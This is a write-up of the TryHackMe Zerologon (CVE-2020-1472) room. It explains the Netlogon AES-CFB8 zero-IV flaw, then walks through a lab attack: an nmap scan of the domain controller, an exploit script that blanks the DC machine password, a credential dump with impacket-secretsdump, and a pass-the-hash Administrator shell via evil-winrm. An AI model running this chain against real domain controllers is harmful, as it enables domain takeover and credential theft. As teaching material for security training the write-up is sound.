Zer0login THM Room

On September 14, Secura released a whitepaper for CVE-2020-1472, that allowed an attacker to go from Zero to Domain Admin in approximately one minute. They dubbed this vulnerability Zero Logon.

Zero Logon is a purely statistics based attack that abuses a feature within MS-NRPC (Microsoft NetLogon Remote Protocol), MS-NRPC is a critical authentication component of Active Directory that handles authentication for User and Machine accounts. In short – the attack mainly focuses on a poor implementation of Cryptography. To be more specific, Microsoft chose to use AES-CFB8 for a function called ComputeNetlogonCredential, which is normally fine, except they had hard coded the Initialization Vector to use all zeros instead of a random string. When an attacker sends a message only containing zeros with the IV of zero, there is a 1-in-256 chance that the Ciphertext will be Zero.

In this room, the ZeroLogon vulnerability is approached from a “Proof of Concept” (PoC) emphasis, providing a breakdown of the vulnerable method within this issue. TryHackMe does not condone illegal actions taken on the part of an individual (or group).

Analysing the MS-NRPC logon process

Simplified Netlogon authentication handshake
Simplified Netlogon authentication handshake

Step 1. The client creates a NetrServerReqChallenge and sends it off with values:

  1. The DC

  2. The Target Device (Also the DC, in our case)

  3. A Nonce (In this case 16 Bytes of Zero).

Step 2. The server receives the NetrServerReqChallenge, the server will then generate its own Nonce (This is called the Server Challenge), and will send the Server Challenge back.

Step 3. The client will compute its NetLogon Credentials with the Server Challenge provided. It uses the NetrServerAuthenticate3 method which requires the following parameters:

  1. A Custom Binding Handle (Impacket handles this for us, it’s negotiated prior)

  2. An Account Name (The Domain Controller’s machine account name. ex: DC01$)

  3. A Secure Channel Type (Impacket sort of handles this for us, but we still need to specify it: nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel)

  4. The Computer Name (The Domain Controller ex: DC01)

  5. The Client Credential String (this will be 8 hextets of \x00 (16 Bytes of Zero))

  6. Negotiation Flags (The following value observed from a Win10 client with Sign/Seal flags disabled: 0x212fffff Provided by Secura)

Step 4. The server will receive the NetrServerAuthenticate request and will compute the same request itself using it’s known, good values. If the results are good, the server will send the required info back to the client.

At this point the attempt to exploit the Zero Logon vulnerability is under way. The above steps above will be looped through a certain number of times to attempt to exploit the Zero Logon vulnerability. The actual exploit occurs at Step 3 and 4, where we are hoping for the Server to a have the same computations as the client. This is where the 1-in-256 chance comes in.

The Zerologon attack
The Zerologon attack, which effectively boils down to filling particular message parameters with
zeroes and retrying the handshake a few times in order to set an empty computer password on the DC.

Step 5. If the server calculates the same value, the client will re-verify and once mutual agreement is confirmed, they will agree on a session key. The session key will be used to encrypt communications between the client and the server, which means authentication is successful.

Instantly Become Domain Admin

Scan target:

$ sudo nmap -sC -sV <target IP> -vv
Starting Nmap 7.93 ( ) at 2022-10-30 20:41 GMT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:41
Completed NSE at 20:41, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:41
Completed NSE at 20:41, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:41
Completed NSE at 20:41, 0.00s elapsed
Initiating Ping Scan at 20:41
Scanning [4 ports]
Completed Ping Scan at 20:41, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:41
Completed Parallel DNS resolution of 1 host. at 20:41, 0.01s elapsed
Initiating SYN Stealth Scan at 20:41
Scanning [1000 ports]
Discovered open port 3389/tcp on
Discovered open port 139/tcp on
Discovered open port 135/tcp on
Discovered open port 80/tcp on
Discovered open port 445/tcp on
Discovered open port 53/tcp on
Discovered open port 636/tcp on
Discovered open port 389/tcp on
Discovered open port 3268/tcp on
Discovered open port 464/tcp on
Discovered open port 3269/tcp on
Discovered open port 88/tcp on
Discovered open port 593/tcp on
Completed SYN Stealth Scan at 20:41, 0.87s elapsed (1000 total ports)
Initiating Service scan at 20:41
Scanning 13 services on
Completed Service scan at 20:43, 142.72s elapsed (13 services on 1 host)
NSE: Script scanning
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:43
Completed NSE at 20:44, 15.02s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:44
Completed NSE at 20:44, 3.42s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
Nmap scan report for
Host is up, received echo-reply ttl 127 (0.047s latency).
Scanned at 2022-10-30 20:41:23 GMT for 162s
Not shown: 987 closed tcp ports (reset)
53/tcp   open  domain?       syn-ack ttl 127
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-10-30 20:41:30Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: hololive.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: hololive.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: HOLOLIVE
|   NetBIOS_Domain_Name: HOLOLIVE
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: hololive.local
|   DNS_Computer_Name: DC01.hololive.local
|   Product_Version: 10.0.17763
|_  System_Time: 2022-10-30T20:43:47+00:00
|_ssl-date: 2022-10-30T20:44:05+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.hololive.local
| Issuer: commonName=DC01.hololive.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-10-29T20:30:54
| Not valid after:  2023-04-30T20:30:54
| MD5:   62030478ed5f961d8de78c4320b6ecb4
| SHA-1: 61f06fd27c274c25bcfd18bf9071deedde71480e
| MIIC6jCCAdKgAwIBAgIQbR35+QuaCqRI7lDweNf1wjANBgkqhkiG9w0BAQsFADAe
| cp541+ob7PH+LFYji9euZrm+RfIBvf/f42e28RJEzk79PKDo0yu/IERVVyMn0xnz
| PRAzHfdKB3J3Ktwb3GBMWthdH1jQ5fT+noi8OTgNozc3Sfyzuo8qL4VCL1vKUr9v
| MyYwzEOEjw+FAnY6KHNU/E8ha3WwYYmt7Gu7mmv1Jv9BF0FbklXZQfuBy92B/crH
| Ac0T54Um+TEUsfmLK6g6SC/YQnBZpgG3QBNbX1wXaq7j/SkuttWMSJJxITNWpOxv
| RbdDjGIHPWhiWK7VqqRWUdhUHdKd2dRVZb9IUWunk0usomaBTt7hxulNstVOWPEC
| SIb3DQEBCwUAA4IBAQAjL74A1GueWnCBqJsc2Q3oQlJosr6fjoVfNkLzfH90IQpr
| XbZeYUNZ9gTRi0xXtMcWlowLGCF8AjnTWttya4Y/YiRSTputuKbcoFIWQ1Y1lr0x
| GekWK3M32FxUVI32korItEby7EdJ9T4vhgSbtnWHL8RuNAqVa7opN3u2KEaanxlv
| z2vNDsbv8DjkAxpfD/p1bj+tLWkxNPIRspIf8B/ywQn2Ia5u8/HKq56MpTWw1O/L
| nWp4P6F4b5ZheeSh+DZhrxnLHFa1JVhZq4rclEeS
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-time: 
|   date: 2022-10-30T20:43:49
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 44856/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 58805/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 55710/udp): CLEAN (Timeout)
|   Check 4 (port 28882/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 162.80 seconds
           Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.080KB)

Get the python script:


Exploit the domain controller:

$ python DC01 <IP target>

 _____                   __                         
/ _  / ___ _ __ ___     / /  ___   __ _  ___  _ __  
\// / / _ \ '__/ _ \   / /  / _ \ / _` |/ _ \| '_ \ 
 / //\  __/ | | (_) | / /__| (_) | (_| | (_) | | | |
/____/\___|_|  \___/  \____/\___/ \__, |\___/|_| |_|
                Vulnerability Discovered by Tom Tervoort
                              Exploit by Ronnie Bartwitz
Performing authentication attempts...
Failure to Autheticate at attempt number: 321
Zero Logon successfully exploited, changing password.

Dump secrets:

$ impacket-secretsdump -just-dc -no-pass DC01\$@<IP target>
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up... 

Go in to get the root flag:

# evil-winrm -u Administrator -H 3f3ef89114fb063e3d7fc23c20f65568 -i <IP target>       

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github:

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/20/2020   2:02 PM             24 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt